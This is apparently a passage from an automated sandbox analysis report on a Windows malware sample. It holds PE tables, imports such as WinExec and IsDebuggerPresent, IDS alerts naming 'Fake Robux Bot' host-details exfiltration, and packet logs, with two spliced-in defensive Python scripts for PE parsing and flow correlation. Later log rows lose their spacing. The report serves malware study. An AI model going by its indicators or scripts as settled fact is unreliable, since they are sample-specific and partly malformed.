.reloc  0xf000           0x30          0x200     37d1b57c226da12c9be78a5fe517e953  False     0.123046875         data                  0.7148111080262498  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA     Size   Type                                                      Language  Country        ZLIB Complexity
RT_MANIFEST  0xe060  0x17d  XML 1.0 document, ASCII text, with CRLF line terminators  English   United States  0.5931758530183727
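The entry point, the data-directory-to-section mapping and the per-section entropy in the tables above can be reproduced on any file with a short stdlib-only walk of the PE headers. The script below is an added example for that purpose; it is not Joe Sandbox code and not the sample's code. When run without arguments it parses a small two-section PE32+ image it builds in memory as constructed input, so it works offline; pass a path as the first argument to run it on a real file. Two details a reader of such tables should keep in mind are built in: the SECURITY directory holds a file offset rather than an RVA, so it is never mapped to a section, and the ImageBase field and the start of the directory array sit at different offsets in PE32 and PE32+ optional headers.

```python
"""Stdlib-only PE header walker: entry point, data directory -> section
mapping and per-section entropy, the fields the report tables show.
Added example, not Joe Sandbox code. Usage: python pe_walk.py [file.exe]"""
import math
import struct
import sys

DIRECTORY_NAMES = [
    "EXPORT", "IMPORT", "RESOURCE", "EXCEPTION", "SECURITY", "BASERELOC",
    "DEBUG", "ARCHITECTURE", "GLOBALPTR", "TLS", "LOAD_CONFIG",
    "BOUND_IMPORT", "IAT", "DELAY_IMPORT", "COM_DESCRIPTOR", "RESERVED",
]
SECURITY_DIR = 4  # stores a raw file offset, not an RVA: never map it to a section


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for constant data, 8.0 for uniformly distributed bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in counts if c)


def parse_pe(data: bytes) -> dict:
    """Parse DOS, COFF and optional headers plus the section table of a PE32/PE32+ image."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    pe_off = struct.unpack_from("<I", data, 0x3C)[0]          # e_lfanew
    if data[pe_off:pe_off + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = pe_off + 4
    nsec = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x20B:                                        # PE32+: 8-byte ImageBase, dirs at +112
        image_base = struct.unpack_from("<Q", data, opt + 24)[0]
        dirs_off = opt + 112
    elif magic == 0x10B:                                      # PE32: 4-byte ImageBase, dirs at +96
        image_base = struct.unpack_from("<I", data, opt + 28)[0]
        dirs_off = opt + 96
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    entry = struct.unpack_from("<I", data, opt + 16)[0]
    subsystem = struct.unpack_from("<H", data, opt + 68)[0]
    n_dirs = struct.unpack_from("<I", data, dirs_off - 4)[0]  # NumberOfRvaAndSizes

    sections = []
    for i in range(nsec):
        name, vsize, va, rawsize, rawptr = struct.unpack_from("<8sIIII", data, opt + opt_size + 40 * i)
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "va": va, "vsize": vsize, "rawsize": rawsize,
                         "entropy": shannon_entropy(data[rawptr:rawptr + rawsize])})

    def section_for_rva(rva):
        for s in sections:
            if s["va"] <= rva < s["va"] + max(s["vsize"], s["rawsize"]):
                return s["name"]
        return None                                           # header area or a bogus RVA

    directories = {}
    for i in range(min(n_dirs, 16)):
        va, size = struct.unpack_from("<II", data, dirs_off + 8 * i)
        in_sec = section_for_rva(va) if va and i != SECURITY_DIR else None
        directories[DIRECTORY_NAMES[i]] = {"va": va, "size": size, "section": in_sec}

    return {"pe32plus": magic == 0x20B, "image_base": image_base, "entry_point": entry,
            "entry_section": section_for_rva(entry), "subsystem": subsystem,
            "sections": sections, "directories": directories}


def build_sample_pe() -> bytes:
    """Constructed two-section PE32+ used as offline input; this is not the analysed sample."""
    FILE_ALIGN, SECT_ALIGN = 0x200, 0x1000
    text = bytes(range(256)) * 2                              # every byte value twice: entropy 8.0
    rdata = b"\0" * FILE_ALIGN                                # constant bytes: entropy 0.0
    dos = b"MZ" + b"\0" * 58 + struct.pack("<I", 0x40)        # e_lfanew = 0x40
    coff = struct.pack("<HHIIIHH", 0x8664, 2, 0, 0, 0, 240, 0x22)
    dirs = [(0, 0)] * 16
    dirs[1] = (0x2040, 0x28)                                  # IMPORT directory placed inside .rdata
    opt = struct.pack("<HBBIIIIIQIIHHHHHHIIIIHHQQQQII",
                      0x20B, 14, 0, len(text), len(rdata), 0, 0x1000, 0x1000, 0x140000000,
                      SECT_ALIGN, FILE_ALIGN, 6, 0, 0, 0, 6, 0, 0, 0x3000, FILE_ALIGN, 0,
                      3, 0x8160, 0x100000, 0x1000, 0x100000, 0x1000, 0, 16)  # subsystem 3 = CUI
    opt += b"".join(struct.pack("<II", va, sz) for va, sz in dirs)
    sec = struct.pack("<8sIIIIIIHHI", b".text", len(text), 0x1000, len(text), 0x200, 0, 0, 0, 0, 0x60000020)
    sec += struct.pack("<8sIIIIIIHHI", b".rdata", len(rdata), 0x2000, len(rdata), 0x400, 0, 0, 0, 0, 0x40000040)
    headers = dos + b"PE\0\0" + coff + opt + sec
    return headers + b"\0" * (FILE_ALIGN - len(headers)) + text + rdata


if __name__ == "__main__":
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample_pe()
    info = parse_pe(blob)
    print(f"Entrypoint {info['image_base'] + info['entry_point']:#x} in {info['entry_section']}, "
          f"subsystem {info['subsystem']}")
    for s in info["sections"]:
        print(f"{s['name']:<8} VA {s['va']:#8x} VSize {s['vsize']:#8x} Raw {s['rawsize']:#8x} "
              f"entropy {s['entropy']:.3f}")
    for name, d in info["directories"].items():
        if d["va"]:
            print(f"{name:<16} {d['va']:#8x} {d['size']:#6x} {d['section'] or '-'}")
```

A directory whose RVA maps to no section, or an entry point outside the code section, is worth a second look; the section entropy column is what drives the "zlib compressed data" / packed-code heuristics, with values above roughly 7 pointing at packed or encrypted content.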
DLL                                Import
KERNEL32.dll                       UnmapViewOfFile, CloseHandle, GetFileSize, CreateFileMappingW, MapViewOfFile, ReadFile, CopyFileA, GetLastError, CreateFileA, WinExec, IsDebuggerPresent, InitializeSListHead, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, IsProcessorFeaturePresent, TerminateProcess, GetCurrentProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, GetModuleHandleW
VCRUNTIME140.dll                   __current_exception, memmove, memcpy, memset, __current_exception_context, strrchr, __C_specific_handler
api-ms-win-crt-heap-l1-1-0.dll     malloc, free, realloc, _set_new_mode
api-ms-win-crt-stdio-l1-1-0.dll    _set_fmode, __stdio_common_vsprintf, __stdio_common_vfprintf, __acrt_iob_func, __p__commode
api-ms-win-crt-runtime-l1-1-0.dll  _exit, _initialize_onexit_table, _register_onexit_function, _cexit, terminate, exit, _register_thread_local_exe_atexit_callback, _initterm_e, _initterm, __p___argv, _crt_atexit, _get_initial_narrow_environment, _initialize_narrow_environment, _configure_narrow_argv, _c_exit, _set_app_type, _seh_filter_exe, __p___argc
api-ms-win-crt-math-l1-1-0.dll     __setusermatherr
api-ms-win-crt-locale-l1-1-0.dll   _configthreadlocale
api-ms-win-crt-string-l1-1-0.dll   strncmp

Language of compilation system  Country where language is spoken
English                         United States
Timestamp                        SID      Signature                                              Severity  Source IP    Source Port  Dest IP          Dest Port  Protocol
2024-10-15T16:01:20.844371+0200  2857658  ETPRO MALWARE Win32/Fake Robux Bot Registration        1         192.168.2.9  49868        162.159.137.232  443        TCP
2024-10-15T16:01:34.007990+0200  2857659  ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil  1         192.168.2.9  49943        162.159.137.232  443        TCP
2024-10-15T16:01:42.173236+0200  2857659  ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil  1         192.168.2.9  49984        162.159.137.232  443        TCP
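When triaging alerts like the ones above against a per-packet log such as the one that follows, the useful first step is to collapse the packets into conversations and check that each alert's 5-tuple and timestamp land inside a flow the capture actually contains. The script below is an added Python example (not Joe Sandbox code) that does this. Its packet lines and alert tuples are a constructed subset copied from this report's rows, rewritten into one timestamp format since the report prints packets as "Oct 15, 2024 ... CEST" and alerts as ISO-8601 with +0200, which is the same local time. The analysis host address 192.168.2.9 is taken from those rows and used to orient every packet as client-to-server or server-to-client; flows 49943 and 49984 named in the second and third alerts do not appear in the rows quoted here, so the example also shows what an alert with no matching flow looks like.

```python
"""Collapse per-packet rows into TCP conversations and attach IDS alerts to them.
Added example with constructed input mirroring the report's columns; not Joe Sandbox code."""
from datetime import datetime, timedelta

SANDBOX_HOST = "192.168.2.9"   # analysis VM address as it appears in the report rows

# Constructed input: a subset of the report's packet rows as "date time sport dport src dst".
PACKETS = """\
2024-10-15 16:00:59.882503986 49757 80 192.168.2.9 185.199.108.133
2024-10-15 16:00:59.887358904 80 49757 185.199.108.133 192.168.2.9
2024-10-15 16:00:59.887454033 49757 80 192.168.2.9 185.199.108.133
2024-10-15 16:00:59.890140057 49757 80 192.168.2.9 185.199.108.133
2024-10-15 16:00:59.894932985 80 49757 185.199.108.133 192.168.2.9
2024-10-15 16:01:00.516709089 80 49757 185.199.108.133 192.168.2.9
2024-10-15 16:01:00.518656015 80 49757 185.199.108.133 192.168.2.9
2024-10-15 16:01:00.518750906 49757 80 192.168.2.9 185.199.108.133
2024-10-15 16:01:00.600095987 49757 80 192.168.2.9 185.199.108.133
2024-10-15 16:01:00.604979038 80 49757 185.199.108.133 192.168.2.9
2024-10-15 16:01:19.985280037 49868 443 192.168.2.9 162.159.137.232
2024-10-15 16:01:19.985368967 443 49868 162.159.137.232 192.168.2.9
2024-10-15 16:01:19.985460997 49868 443 192.168.2.9 162.159.137.232
2024-10-15 16:01:19.985893965 49868 443 192.168.2.9 162.159.137.232
2024-10-15 16:01:19.985913038 443 49868 162.159.137.232 192.168.2.9
2024-10-15 16:01:20.618758917 443 49868 162.159.137.232 192.168.2.9
2024-10-15 16:01:20.618838072 49868 443 192.168.2.9 162.159.137.232
2024-10-15 16:01:20.620219946 49868 443 192.168.2.9 162.159.137.232
2024-10-15 16:01:20.620234966 443 49868 162.159.137.232 192.168.2.9
2024-10-15 16:01:20.620486975 443 49868 162.159.137.232 192.168.2.9
2024-10-15 16:01:20.621377945 49868 443 192.168.2.9 162.159.137.232
2024-10-15 16:01:20.667406082 443 49868 162.159.137.232 192.168.2.9
2024-10-15 16:01:20.667479992 49868 443 192.168.2.9 162.159.137.232
2024-10-15 16:01:20.667488098 443 49868 162.159.137.232 192.168.2.9
2024-10-15 16:01:20.844393015 443 49868 162.159.137.232 192.168.2.9
2024-10-15 16:01:20.844455004 443 49868 162.159.137.232 192.168.2.9
"""

# Constructed from the report's Suricata rows: (time, sid, msg, src, sport, dst, dport).
ALERTS = [
    ("2024-10-15 16:01:20.844371", 2857658, "ETPRO MALWARE Win32/Fake Robux Bot Registration",
     "192.168.2.9", 49868, "162.159.137.232", 443),
    ("2024-10-15 16:01:34.007990", 2857659, "ETPRO MALWARE Win32/Fake Robux Bot Host Details Exfil",
     "192.168.2.9", 49943, "162.159.137.232", 443),
]


def parse_ts(text: str) -> datetime:
    """Accept 6- or 9-digit fractional seconds; strptime's %f takes at most six."""
    date, clock = text.split(" ", 1)
    clock, _, frac = clock.partition(".")
    return datetime.strptime(f"{date} {clock}.{frac[:6].ljust(6, '0')}", "%Y-%m-%d %H:%M:%S.%f")


def flow_key(sport: int, dport: int, src: str, dst: str):
    """Orient a packet so the key is always (client, client_port, server, server_port)."""
    if src == SANDBOX_HOST:
        return (src, sport, dst, dport), "out"
    return (dst, dport, src, sport), "in"


def summarize_flows(log: str) -> dict:
    """Aggregate packets into flows with packet counts per direction and first/last seen."""
    flows = {}
    for line in log.splitlines():
        if not line.strip():
            continue
        date, clock, sport, dport, src, dst = line.split()
        ts = parse_ts(f"{date} {clock}")
        key, direction = flow_key(int(sport), int(dport), src, dst)
        f = flows.setdefault(key, {"packets": 0, "out": 0, "in": 0, "first": ts, "last": ts})
        f["packets"] += 1
        f[direction] += 1
        f["first"], f["last"] = min(f["first"], ts), max(f["last"], ts)
    return flows


def correlate(alert, flows: dict, slack=timedelta(seconds=1)):
    """Return the flow an alert belongs to, or None if no flow matches in 5-tuple and time."""
    ts_text, _sid, _msg, src, sport, dst, dport = alert
    ts = parse_ts(ts_text)
    flow = flows.get((src, sport, dst, dport))
    if flow is None or not (flow["first"] - slack <= ts <= flow["last"] + slack):
        return None
    return flow


if __name__ == "__main__":
    flows = summarize_flows(PACKETS)
    for (cip, cport, sip, sport), f in sorted(flows.items(), key=lambda kv: kv[1]["first"]):
        print(f"{cip}:{cport} -> {sip}:{sport}  {f['packets']:3d} pkts "
              f"({f['out']} out / {f['in']} in)  {f['first'].time()} .. {f['last'].time()}")
    for alert in ALERTS:
        hit = correlate(alert, flows)
        print(f"SID {alert[1]} {alert[2]!r}: " + ("matched flow" if hit else "no matching flow in capture"))
```

A TLS flow carries no readable payload, so the IDS signature on the 49868 conversation fires on what is visible in the clear (SNI, JA3, sizes and timing); the correlation above only tells you which conversation to pull from the pcap, not what was said in it.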
Timestamp                             Source Port  Dest Port  Source IP        Dest IP
Oct 15, 2024 16:00:59.882503986 CEST  49757        80         192.168.2.9      185.199.108.133
Oct 15, 2024 16:00:59.887358904 CEST  80           49757      185.199.108.133  192.168.2.9
Oct 15, 2024 16:00:59.887454033 CEST  49757        80         192.168.2.9      185.199.108.133
Oct 15, 2024 16:00:59.890140057 CEST  49757        80         192.168.2.9      185.199.108.133
Oct 15, 2024 16:00:59.894932985 CEST  80           49757      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:00.516709089 CEST  80           49757      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:00.518656015 CEST  80           49757      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:00.518750906 CEST  49757        80         192.168.2.9      185.199.108.133
Oct 15, 2024 16:01:00.600095987 CEST  49757        80         192.168.2.9      185.199.108.133
Oct 15, 2024 16:01:00.604435921 CEST  49763        443        192.168.2.9      185.199.108.133
Oct 15, 2024 16:01:00.604481936 CEST  443          49763      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:00.604547024 CEST  49763        443        192.168.2.9      185.199.108.133
Oct 15, 2024 16:01:00.604979038 CEST  80           49757      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:00.654700041 CEST  49763        443        192.168.2.9      185.199.108.133
Oct 15, 2024 16:01:00.654717922 CEST  443          49763      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:01.310168028 CEST  443          49763      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:01.310743093 CEST  49763        443        192.168.2.9      185.199.108.133
Oct 15, 2024 16:01:01.313968897 CEST  49763        443        192.168.2.9      185.199.108.133
Oct 15, 2024 16:01:01.313982964 CEST  443          49763      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:01.314243078 CEST  443          49763      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:01.321593046 CEST  49763        443        192.168.2.9      185.199.108.133
Oct 15, 2024 16:01:01.363404036 CEST  443          49763      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:01.546036959 CEST  443          49763      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:01.546133041 CEST  443          49763      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:01.546166897 CEST  443          49763      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:01.546200037 CEST  443          49763      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:01.546224117 CEST  49763        443        192.168.2.9      185.199.108.133
Oct 15, 2024 16:01:01.546231985 CEST  443          49763      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:01.546246052 CEST  443          49763      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:01.546256065 CEST  49763        443        192.168.2.9      185.199.108.133
Oct 15, 2024 16:01:01.546328068 CEST  49763        443        192.168.2.9      185.199.108.133
Oct 15, 2024 16:01:01.546339989 CEST  443          49763      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:01.546355963 CEST  443          49763      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:01.546516895 CEST  49763        443        192.168.2.9      185.199.108.133
Oct 15, 2024 16:01:01.601566076 CEST  49763        443        192.168.2.9      185.199.108.133
Oct 15, 2024 16:01:17.876583099 CEST  49854        80         192.168.2.9      104.20.3.235
Oct 15, 2024 16:01:17.881484032 CEST  80           49854      104.20.3.235     192.168.2.9
Oct 15, 2024 16:01:17.881556034 CEST  49854        80         192.168.2.9      104.20.3.235
Oct 15, 2024 16:01:17.886178970 CEST  49854        80         192.168.2.9      104.20.3.235
Oct 15, 2024 16:01:17.890964985 CEST  80           49854      104.20.3.235     192.168.2.9
Oct 15, 2024 16:01:18.492137909 CEST  80           49854      104.20.3.235     192.168.2.9
Oct 15, 2024 16:01:18.530236006 CEST  49856        443        192.168.2.9      104.20.3.235
Oct 15, 2024 16:01:18.530272961 CEST  443          49856      104.20.3.235     192.168.2.9
Oct 15, 2024 16:01:18.530358076 CEST  49856        443        192.168.2.9      104.20.3.235
Oct 15, 2024 16:01:18.541100025 CEST  49854        80         192.168.2.9      104.20.3.235
Oct 15, 2024 16:01:18.564755917 CEST  49856        443        192.168.2.9      104.20.3.235
Oct 15, 2024 16:01:18.564778090 CEST  443          49856      104.20.3.235     192.168.2.9
Oct 15, 2024 16:01:19.187001944 CEST  443          49856      104.20.3.235     192.168.2.9
Oct 15, 2024 16:01:19.187073946 CEST  49856        443        192.168.2.9      104.20.3.235
Oct 15, 2024 16:01:19.189836025 CEST  49856        443        192.168.2.9      104.20.3.235
Oct 15, 2024 16:01:19.189841986 CEST  443          49856      104.20.3.235     192.168.2.9
Oct 15, 2024 16:01:19.190085888 CEST  443          49856      104.20.3.235     192.168.2.9
Oct 15, 2024 16:01:19.197185040 CEST  49856        443        192.168.2.9      104.20.3.235
Oct 15, 2024 16:01:19.243431091 CEST  443          49856      104.20.3.235     192.168.2.9
Oct 15, 2024 16:01:19.342922926 CEST  443          49856      104.20.3.235     192.168.2.9
Oct 15, 2024 16:01:19.343031883 CEST  443          49856      104.20.3.235     192.168.2.9
Oct 15, 2024 16:01:19.343086004 CEST  49856        443        192.168.2.9      104.20.3.235
Oct 15, 2024 16:01:19.366019011 CEST  49856        443        192.168.2.9      104.20.3.235
Oct 15, 2024 16:01:19.380590916 CEST  49862        80         192.168.2.9      185.199.108.133
Oct 15, 2024 16:01:19.385601997 CEST  80           49862      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:19.385685921 CEST  49862        80         192.168.2.9      185.199.108.133
Oct 15, 2024 16:01:19.385906935 CEST  49862        80         192.168.2.9      185.199.108.133
Oct 15, 2024 16:01:19.390773058 CEST  80           49862      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:19.985280037 CEST  49868        443        192.168.2.9      162.159.137.232
Oct 15, 2024 16:01:19.985368967 CEST  443          49868      162.159.137.232  192.168.2.9
Oct 15, 2024 16:01:19.985460997 CEST  49868        443        192.168.2.9      162.159.137.232
Oct 15, 2024 16:01:19.985893965 CEST  49868        443        192.168.2.9      162.159.137.232
Oct 15, 2024 16:01:19.985913038 CEST  443          49868      162.159.137.232  192.168.2.9
Oct 15, 2024 16:01:19.998683929 CEST  80           49862      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:19.998852968 CEST  49862        80         192.168.2.9      185.199.108.133
Oct 15, 2024 16:01:19.999705076 CEST  49869        443        192.168.2.9      185.199.108.133
Oct 15, 2024 16:01:19.999737978 CEST  443          49869      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:19.999749899 CEST  80           49862      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:19.999831915 CEST  49862        80         192.168.2.9      185.199.108.133
Oct 15, 2024 16:01:19.999878883 CEST  49869        443        192.168.2.9      185.199.108.133
Oct 15, 2024 16:01:20.000082970 CEST  49869        443        192.168.2.9      185.199.108.133
Oct 15, 2024 16:01:20.000097036 CEST  443          49869      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:20.004415989 CEST  80           49862      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:20.613519907 CEST  443          49869      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:20.613802910 CEST  49869        443        192.168.2.9      185.199.108.133
Oct 15, 2024 16:01:20.615279913 CEST  49869        443        192.168.2.9      185.199.108.133
Oct 15, 2024 16:01:20.615294933 CEST  443          49869      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:20.615562916 CEST  443          49869      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:20.616941929 CEST  49869        443        192.168.2.9      185.199.108.133
Oct 15, 2024 16:01:20.618758917 CEST  443          49868      162.159.137.232  192.168.2.9
Oct 15, 2024 16:01:20.618838072 CEST  49868        443        192.168.2.9      162.159.137.232
Oct 15, 2024 16:01:20.620219946 CEST  49868        443        192.168.2.9      162.159.137.232
Oct 15, 2024 16:01:20.620234966 CEST  443          49868      162.159.137.232  192.168.2.9
Oct 15, 2024 16:01:20.620486975 CEST  443          49868      162.159.137.232  192.168.2.9
Oct 15, 2024 16:01:20.621377945 CEST  49868        443        192.168.2.9      162.159.137.232
Oct 15, 2024 16:01:20.663410902 CEST  443          49869      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:20.667406082 CEST  443          49868      162.159.137.232  192.168.2.9
Oct 15, 2024 16:01:20.667479992 CEST  49868        443        192.168.2.9      162.159.137.232
Oct 15, 2024 16:01:20.667488098 CEST  443          49868      162.159.137.232  192.168.2.9
Oct 15, 2024 16:01:20.744543076 CEST  443          49869      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:20.744642019 CEST  443          49869      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:20.744678020 CEST  443          49869      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:20.744718075 CEST  49869        443        192.168.2.9      185.199.108.133
Oct 15, 2024 16:01:20.744729042 CEST  443          49869      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:20.744735956 CEST  443          49869      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:20.744765043 CEST  49869        443        192.168.2.9      185.199.108.133
Oct 15, 2024 16:01:20.744772911 CEST  443          49869      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:20.744832039 CEST  49869        443        192.168.2.9      185.199.108.133
Oct 15, 2024 16:01:20.744839907 CEST  443          49869      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:20.752732038 CEST  443          49869      185.199.108.133  192.168.2.9
Oct 15, 2024 16:01:20.752945900 CEST  49869        443        192.168.2.9      185.199.108.133
Oct 15, 2024 16:01:20.765908003 CEST  49869        443        192.168.2.9      185.199.108.133
Oct 15, 2024 16:01:20.844393015 CEST  443          49868      162.159.137.232  192.168.2.9
Oct 15, 2024 16:01:20.844455004 CEST  443          49868      162.159.137.232  192.168.2.9
                                                              Oct 15, 2024 16:01:20.844505072 CEST49868443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:20.852142096 CEST49868443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:25.930706024 CEST4990180192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:25.935585976 CEST8049901104.20.3.235192.168.2.9
                                                              Oct 15, 2024 16:01:25.935655117 CEST4990180192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:25.937182903 CEST4990180192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:25.942060947 CEST8049901104.20.3.235192.168.2.9
                                                              Oct 15, 2024 16:01:26.562858105 CEST8049901104.20.3.235192.168.2.9
                                                              Oct 15, 2024 16:01:26.584403038 CEST49905443192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:26.584441900 CEST44349905104.20.3.235192.168.2.9
                                                              Oct 15, 2024 16:01:26.584510088 CEST49905443192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:26.603745937 CEST4990180192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:26.616962910 CEST49905443192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:26.616987944 CEST44349905104.20.3.235192.168.2.9
                                                              Oct 15, 2024 16:01:27.277482986 CEST44349905104.20.3.235192.168.2.9
                                                              Oct 15, 2024 16:01:27.277568102 CEST49905443192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:27.279268980 CEST49905443192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:27.279279947 CEST44349905104.20.3.235192.168.2.9
                                                              Oct 15, 2024 16:01:27.279540062 CEST44349905104.20.3.235192.168.2.9
                                                              Oct 15, 2024 16:01:27.286078930 CEST49905443192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:27.327413082 CEST44349905104.20.3.235192.168.2.9
                                                              Oct 15, 2024 16:01:27.430202007 CEST44349905104.20.3.235192.168.2.9
                                                              Oct 15, 2024 16:01:27.430325985 CEST44349905104.20.3.235192.168.2.9
                                                              Oct 15, 2024 16:01:27.430473089 CEST49905443192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:27.452076912 CEST49905443192.168.2.9104.20.3.235
                                                              Oct 15, 2024 16:01:27.474828005 CEST4991180192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:27.479907990 CEST8049911185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:27.479976892 CEST4991180192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:27.480190992 CEST4991180192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:27.485009909 CEST8049911185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:28.116748095 CEST8049911185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:28.117039919 CEST4991180192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:28.118220091 CEST49916443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:28.118282080 CEST44349916185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:28.118417978 CEST49916443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:28.118705034 CEST49916443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:28.118726969 CEST44349916185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:28.122673035 CEST8049911185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:28.123086929 CEST4991180192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:28.775696039 CEST44349916185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:28.775856972 CEST49916443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:28.777981043 CEST49916443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:28.778001070 CEST44349916185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:28.778249979 CEST44349916185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:28.779520988 CEST49916443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:28.823412895 CEST44349916185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:28.907011032 CEST44349916185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:28.907090902 CEST44349916185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:28.907135010 CEST44349916185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:28.907145023 CEST49916443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:28.907162905 CEST44349916185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:28.907203913 CEST49916443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:28.907263994 CEST44349916185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:28.907502890 CEST44349916185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:28.907548904 CEST49916443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:28.907557964 CEST44349916185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:28.907579899 CEST44349916185.199.108.133192.168.2.9
                                                              Oct 15, 2024 16:01:28.907623053 CEST49916443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:28.929893017 CEST49916443192.168.2.9185.199.108.133
                                                              Oct 15, 2024 16:01:33.142904043 CEST49943443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:33.142955065 CEST44349943162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:33.143035889 CEST49943443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:33.143548012 CEST49943443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:33.143562078 CEST44349943162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:33.750576019 CEST44349943162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:33.750736952 CEST49943443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:33.752254963 CEST49943443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:33.752274990 CEST44349943162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:33.752568960 CEST44349943162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:33.753514051 CEST49943443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:33.799395084 CEST44349943162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:33.799453020 CEST49943443192.168.2.9162.159.137.232
                                                              Oct 15, 2024 16:01:33.799460888 CEST44349943162.159.137.232192.168.2.9
                                                              Oct 15, 2024 16:01:34.007994890 CEST44349943162.159.137.232192.168.2.9
